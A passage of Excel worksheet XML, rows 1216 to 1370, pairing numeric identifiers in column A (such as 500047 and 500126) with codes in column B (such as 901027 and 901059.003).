      <c r="A1216" s="5">
        <v>500047</v>
      </c>
      <c r="B1216" s="3">
        <v>901534</v>
      </c>
    </row>
    <row r="1217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1217" s="5">
        <v>500047</v>
      </c>
      <c r="B1217" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1218" s="5">
        <v>500047</v>
      </c>
      <c r="B1218" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="1219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1219" s="5">
        <v>500047</v>
      </c>
      <c r="B1219" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1220" s="5">
        <v>500047</v>
      </c>
      <c r="B1220" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="1221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1221" s="5">
        <v>500047</v>
      </c>
      <c r="B1221" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="1222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1222" s="5">
        <v>500047</v>
      </c>
      <c r="B1222" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="1223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1223" s="5">
        <v>500047</v>
      </c>
      <c r="B1223" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="1224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1224" s="5">
        <v>500047</v>
      </c>
      <c r="B1224" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1225" s="5">
        <v>500047</v>
      </c>
      <c r="B1225" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1226" s="5">
        <v>500047</v>
      </c>
      <c r="B1226" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1227" s="5">
        <v>500047</v>
      </c>
      <c r="B1227" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="1228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1228" s="5">
        <v>500047</v>
      </c>
      <c r="B1228" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1229" s="5">
        <v>500047</v>
      </c>
      <c r="B1229" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1230" s="5">
        <v>500047</v>
      </c>
      <c r="B1230" s="3">
        <v>901080</v>
      </c>
    </row>
    <row r="1231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1231" s="5">
        <v>500047</v>
      </c>
      <c r="B1231" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="1232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1232" s="5">
        <v>500047</v>
      </c>
      <c r="B1232" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1233" s="5">
        <v>500047</v>
      </c>
      <c r="B1233" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="1234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1234" s="5">
        <v>500115</v>
      </c>
      <c r="B1234" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1235" s="5">
        <v>500115</v>
      </c>
      <c r="B1235" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="1236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1236" s="5">
        <v>500115</v>
      </c>
      <c r="B1236" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1237" s="5">
        <v>500115</v>
      </c>
      <c r="B1237" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1238" s="5">
        <v>500115</v>
      </c>
      <c r="B1238" s="3">
        <v>901566</v>
      </c>
    </row>
    <row r="1239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1239" s="5">
        <v>500115</v>
      </c>
      <c r="B1239" s="3">
        <v>901219</v>
      </c>
    </row>
    <row r="1240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1240" s="5">
        <v>500115</v>
      </c>
      <c r="B1240" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1241" s="5">
        <v>500115</v>
      </c>
      <c r="B1241" s="3">
        <v>901195.00199999998</v>
      </c>
    </row>
    <row r="1242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1242" s="5">
        <v>500115</v>
      </c>
      <c r="B1242" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="1243" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1243" s="5">
        <v>500078</v>
      </c>
      <c r="B1243" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1244" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1244" s="5">
        <v>500078</v>
      </c>
      <c r="B1244" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="1245" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1245" s="5">
        <v>500078</v>
      </c>
      <c r="B1245" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1246" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1246" s="5">
        <v>500078</v>
      </c>
      <c r="B1246" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1247" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1247" s="5">
        <v>500078</v>
      </c>
      <c r="B1247" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1248" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1248" s="5">
        <v>500078</v>
      </c>
      <c r="B1248" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1249" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1249" s="5">
        <v>500078</v>
      </c>
      <c r="B1249" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="1250" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1250" s="5">
        <v>500078</v>
      </c>
      <c r="B1250" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1251" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1251" s="5">
        <v>500078</v>
      </c>
      <c r="B1251" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1252" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1252" s="5">
        <v>500078</v>
      </c>
      <c r="B1252" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1253" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1253" s="5">
        <v>500078</v>
      </c>
      <c r="B1253" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="1254" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1254" s="5">
        <v>500078</v>
      </c>
      <c r="B1254" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1255" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1255" s="5">
        <v>500078</v>
      </c>
      <c r="B1255" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1256" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1256" s="5">
        <v>500078</v>
      </c>
      <c r="B1256" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="1257" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1257" s="5">
        <v>500078</v>
      </c>
      <c r="B1257" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="1258" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1258" s="5">
        <v>500078</v>
      </c>
      <c r="B1258" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1259" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1259" s="5">
        <v>500043</v>
      </c>
      <c r="B1259" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1260" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1260" s="5">
        <v>500043</v>
      </c>
      <c r="B1260" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1261" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1261" s="5">
        <v>500043</v>
      </c>
      <c r="B1261" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1262" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1262" s="5">
        <v>500043</v>
      </c>
      <c r="B1262" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1263" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1263" s="5">
        <v>500125</v>
      </c>
      <c r="B1263" s="3">
        <v>901583.00300000003</v>
      </c>
    </row>
    <row r="1264" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1264" s="5">
        <v>500125</v>
      </c>
      <c r="B1264" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="1265" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1265" s="5">
        <v>500125</v>
      </c>
      <c r="B1265" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1266" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1266" s="5">
        <v>500125</v>
      </c>
      <c r="B1266" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1267" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1267" s="5">
        <v>500125</v>
      </c>
      <c r="B1267" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1268" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1268" s="5">
        <v>500125</v>
      </c>
      <c r="B1268" s="3">
        <v>901136.00199999998</v>
      </c>
    </row>
    <row r="1269" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1269" s="5">
        <v>500125</v>
      </c>
      <c r="B1269" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="1270" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1270" s="5">
        <v>500125</v>
      </c>
      <c r="B1270" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="1271" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1271" s="5">
        <v>500125</v>
      </c>
      <c r="B1271" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="1272" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1272" s="5">
        <v>500125</v>
      </c>
      <c r="B1272" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1273" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1273" s="5">
        <v>500125</v>
      </c>
      <c r="B1273" s="3">
        <v>901592.00399999996</v>
      </c>
    </row>
    <row r="1274" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1274" s="5">
        <v>500125</v>
      </c>
      <c r="B1274" s="3">
        <v>901589.00199999998</v>
      </c>
    </row>
    <row r="1275" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1275" s="5">
        <v>500125</v>
      </c>
      <c r="B1275" s="3">
        <v>901590</v>
      </c>
    </row>
    <row r="1276" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1276" s="5">
        <v>500125</v>
      </c>
      <c r="B1276" s="3">
        <v>901590.005</v>
      </c>
    </row>
    <row r="1277" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1277" s="5">
        <v>500125</v>
      </c>
      <c r="B1277" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1278" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1278" s="5">
        <v>500125</v>
      </c>
      <c r="B1278" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="1279" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1279" s="5">
        <v>500125</v>
      </c>
      <c r="B1279" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1280" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1280" s="5">
        <v>500125</v>
      </c>
      <c r="B1280" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="1281" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1281" s="5">
        <v>500125</v>
      </c>
      <c r="B1281" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1282" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1282" s="5">
        <v>500125</v>
      </c>
      <c r="B1282" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="1283" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1283" s="5">
        <v>500125</v>
      </c>
      <c r="B1283" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="1284" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1284" s="5">
        <v>500126</v>
      </c>
      <c r="B1284" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1285" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1285" s="5">
        <v>500126</v>
      </c>
      <c r="B1285" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1286" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1286" s="5">
        <v>500126</v>
      </c>
      <c r="B1286" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1287" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1287" s="5">
        <v>500126</v>
      </c>
      <c r="B1287" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1288" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1288" s="5">
        <v>500126</v>
      </c>
      <c r="B1288" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1289" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1289" s="5">
        <v>500126</v>
      </c>
      <c r="B1289" s="3">
        <v>901001.00300000003</v>
      </c>
    </row>
    <row r="1290" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1290" s="5">
        <v>500126</v>
      </c>
      <c r="B1290" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1291" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1291" s="5">
        <v>500126</v>
      </c>
      <c r="B1291" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="1292" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1292" s="5">
        <v>500126</v>
      </c>
      <c r="B1292" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1293" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1293" s="5">
        <v>500126</v>
      </c>
      <c r="B1293" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1294" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1294" s="5">
        <v>500126</v>
      </c>
      <c r="B1294" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="1295" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1295" s="5">
        <v>500126</v>
      </c>
      <c r="B1295" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1296" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1296" s="5">
        <v>500126</v>
      </c>
      <c r="B1296" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1297" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1297" s="5">
        <v>500126</v>
      </c>
      <c r="B1297" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="1298" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1298" s="5">
        <v>500126</v>
      </c>
      <c r="B1298" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1299" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1299" s="5">
        <v>500126</v>
      </c>
      <c r="B1299" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="1300" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1300" s="5">
        <v>500126</v>
      </c>
      <c r="B1300" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1301" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1301" s="5">
        <v>500126</v>
      </c>
      <c r="B1301" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1302" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1302" s="5">
        <v>500126</v>
      </c>
      <c r="B1302" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="1303" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1303" s="5">
        <v>500126</v>
      </c>
      <c r="B1303" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1304" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1304" s="5">
        <v>500126</v>
      </c>
      <c r="B1304" s="3">
        <v>901029</v>
      </c>
    </row>
    <row r="1305" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1305" s="5">
        <v>500126</v>
      </c>
      <c r="B1305" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1306" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1306" s="5">
        <v>500126</v>
      </c>
      <c r="B1306" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1307" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1307" s="5">
        <v>500126</v>
      </c>
      <c r="B1307" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="1308" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1308" s="5">
        <v>500126</v>
      </c>
      <c r="B1308" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1309" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1309" s="5">
        <v>500126</v>
      </c>
      <c r="B1309" s="3">
        <v>901220</v>
      </c>
    </row>
    <row r="1310" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1310" s="5">
        <v>500072</v>
      </c>
      <c r="B1310" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="1311" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1311" s="5">
        <v>500072</v>
      </c>
      <c r="B1311" s="3">
        <v>901071.00199999998</v>
      </c>
    </row>
    <row r="1312" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1312" s="5">
        <v>500072</v>
      </c>
      <c r="B1312" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1313" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1313" s="5">
        <v>500072</v>
      </c>
      <c r="B1313" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="1314" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1314" s="5">
        <v>500072</v>
      </c>
      <c r="B1314" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1315" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1315" s="5">
        <v>500072</v>
      </c>
      <c r="B1315" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1316" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1316" s="5">
        <v>500072</v>
      </c>
      <c r="B1316" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1317" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1317" s="5">
        <v>500072</v>
      </c>
      <c r="B1317" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1318" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1318" s="5">
        <v>500072</v>
      </c>
      <c r="B1318" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1319" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1319" s="5">
        <v>500072</v>
      </c>
      <c r="B1319" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1320" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1320" s="5">
        <v>500072</v>
      </c>
      <c r="B1320" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1321" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1321" s="5">
        <v>500072</v>
      </c>
      <c r="B1321" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="1322" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1322" s="5">
        <v>500072</v>
      </c>
      <c r="B1322" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1323" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1323" s="5">
        <v>500072</v>
      </c>
      <c r="B1323" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1324" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1324" s="5">
        <v>500072</v>
      </c>
      <c r="B1324" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1325" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1325" s="5">
        <v>500072</v>
      </c>
      <c r="B1325" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1326" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1326" s="5">
        <v>500072</v>
      </c>
      <c r="B1326" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1327" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1327" s="5">
        <v>500072</v>
      </c>
      <c r="B1327" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1328" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1328" s="5">
        <v>500072</v>
      </c>
      <c r="B1328" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1329" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1329" s="5">
        <v>500072</v>
      </c>
      <c r="B1329" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1330" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1330" s="5">
        <v>500072</v>
      </c>
      <c r="B1330" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1331" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1331" s="5">
        <v>500100</v>
      </c>
      <c r="B1331" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1332" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1332" s="5">
        <v>500100</v>
      </c>
      <c r="B1332" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1333" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1333" s="5">
        <v>500100</v>
      </c>
      <c r="B1333" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1334" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1334" s="5">
        <v>500100</v>
      </c>
      <c r="B1334" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1335" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1335" s="5">
        <v>500100</v>
      </c>
      <c r="B1335" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1336" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1336" s="5">
        <v>500100</v>
      </c>
      <c r="B1336" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1337" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1337" s="5">
        <v>500100</v>
      </c>
      <c r="B1337" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="1338" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1338" s="5">
        <v>500100</v>
      </c>
      <c r="B1338" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1339" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1339" s="5">
        <v>500100</v>
      </c>
      <c r="B1339" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1340" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1340" s="5">
        <v>500100</v>
      </c>
      <c r="B1340" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1341" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1341" s="5">
        <v>500100</v>
      </c>
      <c r="B1341" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1342" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1342" s="5">
        <v>500100</v>
      </c>
      <c r="B1342" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="1343" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1343" s="5">
        <v>500100</v>
      </c>
      <c r="B1343" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1344" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1344" s="5">
        <v>500100</v>
      </c>
      <c r="B1344" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1345" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1345" s="5">
        <v>500100</v>
      </c>
      <c r="B1345" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="1346" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1346" s="5">
        <v>500100</v>
      </c>
      <c r="B1346" s="3">
        <v>901218.005</v>
      </c>
    </row>
    <row r="1347" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1347" s="5">
        <v>500100</v>
      </c>
      <c r="B1347" s="3">
        <v>901218.01</v>
      </c>
    </row>
    <row r="1348" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1348" s="5">
        <v>500100</v>
      </c>
      <c r="B1348" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="1349" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1349" s="5">
        <v>500100</v>
      </c>
      <c r="B1349" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1350" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1350" s="5">
        <v>500100</v>
      </c>
      <c r="B1350" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="1351" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1351" s="5">
        <v>500100</v>
      </c>
      <c r="B1351" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1352" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1352" s="5">
        <v>500100</v>
      </c>
      <c r="B1352" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="1353" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1353" s="5">
        <v>500136</v>
      </c>
      <c r="B1353" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="1354" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1354" s="5">
        <v>500136</v>
      </c>
      <c r="B1354" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="1355" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1355" s="5">
        <v>500136</v>
      </c>
      <c r="B1355" s="3">
        <v>901586.00199999998</v>
      </c>
    </row>
    <row r="1356" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1356" s="5">
        <v>500136</v>
      </c>
      <c r="B1356" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1357" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1357" s="5">
        <v>500136</v>
      </c>
      <c r="B1357" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1358" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1358" s="5">
        <v>500136</v>
      </c>
      <c r="B1358" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1359" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1359" s="5">
        <v>500136</v>
      </c>
      <c r="B1359" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1360" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1360" s="5">
        <v>500119</v>
      </c>
      <c r="B1360" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1361" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1361" s="5">
        <v>500119</v>
      </c>
      <c r="B1361" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1362" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1362" s="5">
        <v>500119</v>
      </c>
      <c r="B1362" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1363" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1363" s="5">
        <v>500119</v>
      </c>
      <c r="B1363" s="3">
        <v>901584.00399999996</v>
      </c>
    </row>
    <row r="1364" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1364" s="5">
        <v>500119</v>
      </c>
      <c r="B1364" s="3">
        <v>901136</v>
      </c>
    </row>
    <row r="1365" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1365" s="5">
        <v>500119</v>
      </c>
      <c r="B1365" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="1366" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1366" s="5">
        <v>500119</v>
      </c>
      <c r="B1366" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1367" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1367" s="5">
        <v>500119</v>
      </c>
      <c r="B1367" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="1368" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1368" s="5">
        <v>500119</v>
      </c>
      <c r="B1368" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1369" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1369" s="5">
        <v>500119</v>
      </c>
      <c r="B1369" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="1370" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1370" s="5">
        <v>500119</v>
      </c>
      <c r="B1370" s="3">
        <v>901105</v>
      </c>
    </row>
